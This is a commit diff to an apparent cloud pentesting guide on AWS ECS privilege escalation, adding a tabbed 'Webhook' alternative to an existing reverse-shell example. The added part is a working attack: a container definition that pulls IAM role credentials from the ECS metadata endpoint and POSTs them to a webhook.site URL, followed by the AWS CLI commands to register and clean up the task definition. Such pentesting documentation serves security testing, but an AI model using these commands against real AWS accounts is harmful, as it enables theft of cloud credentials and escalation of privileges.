arte-courtneybell

Added webhook alternative example (tested) to task definition as a new tab

Author: courtneyimbert

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md

@@ -14,6 +14,8 @@ More **info about ECS** in:
 
 An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.
 
+{{#tabs }}
+{{#tab name="Reverse Shell" }}
 ```bash
 # Generate task definition with rev shell
 aws ecs register-task-definition --family iam_exfiltration \
@@ -34,6 +36,47 @@ aws ecs run-task --task-definition iam_exfiltration \
 aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 ```
 
+{{#endtab }}
+
+{{#tab name="Webhook" }}
+
+Create a webhook with a site like webhook.site 
+
+```bash
+
+# Create file container-definition.json
+[
+  {
+    "name": "exfil_creds",
+    "image": "python:latest",
+    "entryPoint": ["sh", "-c"],
+    "command": [
+      "CREDS=$(curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}); curl -X POST -H 'Content-Type: application/json' -d \"$CREDS\" https://webhook.site/abcdef12-3456-7890-abcd-ef1234567890"
+    ]
+  }
+]
+
+# Run task definition, uploading the .json file
+aws ecs register-task-definition \
+  --family iam_exfiltration \
+  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
+  --network-mode "awsvpc" \
+  --cpu 256 \
+  --memory 512 \
+  --requires-compatibilities FARGATE \
+  --container-definitions file://container-definition.json
+  
+# Check the webhook for a response
+
+# Delete task definition
+## You need to remove all the versions (:1 is enough if you just created one)
+aws ecs deregister-task-definition --task-definition iam_exfiltration:1
+
+```
+{{#endtab }}
+
+{{#endtabs }}
+
 **Potential Impact:** Direct privesc to a different ECS role.
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`